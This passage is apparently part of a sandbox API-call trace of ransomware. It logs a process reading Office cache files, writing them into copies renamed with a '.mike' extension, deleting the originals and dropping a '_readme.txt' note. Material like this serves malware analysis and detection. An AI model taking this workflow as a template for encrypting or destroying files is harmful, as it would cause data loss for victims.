"c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e7e400, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e7e400, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e7e400, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770)) returned 1 [0041.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0041.445] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.446] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", lpFilePart=0x0) returned 0x5e [0041.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.446] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x218435c | out: lpFileInformation=0x218435c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e7e400, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e7e400, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e7e400, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770)) returned 1 [0041.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.446] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.446] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", dwFileAttributes=0x80) returned 1 [0041.446] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.446] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 1 [0041.447] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0041.447] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0041.447] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.447] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\_readme.txt", lpFilePart=0x0) returned 0x57 [0041.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0041.447] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.448] GetFileType (hFile=0x264) returned 0x1 [0041.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0041.448] GetFileType (hFile=0x264) returned 0x1 [0041.448] WriteFile (in: hFile=0x264, lpBuffer=0x2186154*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x2186154*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0041.449] CloseHandle (hObject=0x264) returned 1 [0041.449] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpFilePart=0x0) returned 0x55 [0041.449] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.449] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.449] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0041.449] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.450] GetFileType (hFile=0x264) returned 0x1 [0041.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0041.450] GetFileType (hFile=0x264) returned 0x1 [0041.450] CloseHandle (hObject=0x264) returned 1 [0041.450] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.450] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.450] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0041.450] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0041.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0041.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.450] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x218a36c | out: lpFileInformation=0x218a36c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0041.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.451] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.451] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x218a6d0 | out: lpFileInformation=0x218a6d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0041.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.451] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.451] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0041.451] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0041.451] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.451] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.483] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.483] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0041.483] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0041.483] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0041.483] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.484] GetFileType (hFile=0x264) returned 0x1 [0041.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0041.484] GetFileType (hFile=0x264) returned 0x1 [0041.484] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0041.484] WriteFile (in: hFile=0x264, lpBuffer=0x218b72c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x218b72c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0041.485] CloseHandle (hObject=0x264) returned 1 [0041.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.485] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x218b1c8 | out: lpFileInformation=0x218b1c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0041.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.485] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0041.485] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.485] GetFileType (hFile=0x264) returned 0x1 [0041.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0041.485] GetFileType (hFile=0x264) returned 0x1 [0041.485] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0041.485] ReadFile (in: hFile=0x264, lpBuffer=0x218c87c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x218c87c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.487] CloseHandle (hObject=0x264) returned 1 [0041.488] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0041.488] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.488] GetFileType (hFile=0x264) returned 0x1 [0041.488] GetFileType (hFile=0x264) returned 0x1 [0041.488] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0041.489] WriteFile (in: hFile=0x264, lpBuffer=0x2196de4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2196de4*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.489] CloseHandle (hObject=0x264) returned 1 [0041.490] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.490] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.490] GetFileType (hFile=0x264) returned 0x1 [0041.490] GetFileType (hFile=0x264) returned 0x1 [0041.490] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0041.490] ReadFile (in: hFile=0x264, lpBuffer=0x2199888, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2199888*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.490] CloseHandle (hObject=0x264) returned 1 [0041.491] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.491] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.491] GetFileType (hFile=0x264) returned 0x1 [0041.491] GetFileType (hFile=0x264) returned 0x1 [0041.491] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2a20 [0041.491] WriteFile (in: hFile=0x264, lpBuffer=0x21a3df0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21a3df0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.491] CloseHandle (hObject=0x264) returned 1 [0041.492] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.492] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.492] GetFileType (hFile=0x264) returned 0x1 [0041.492] GetFileType (hFile=0x264) returned 0x1 [0041.492] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5000 [0041.493] ReadFile (in: hFile=0x264, lpBuffer=0x21a6894, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21a6894*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.493] CloseHandle (hObject=0x264) returned 1 [0041.493] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.493] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.493] GetFileType (hFile=0x264) returned 0x1 [0041.493] GetFileType (hFile=0x264) returned 0x1 [0041.494] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5220 [0041.494] WriteFile (in: hFile=0x264, lpBuffer=0x21b0dfc*, 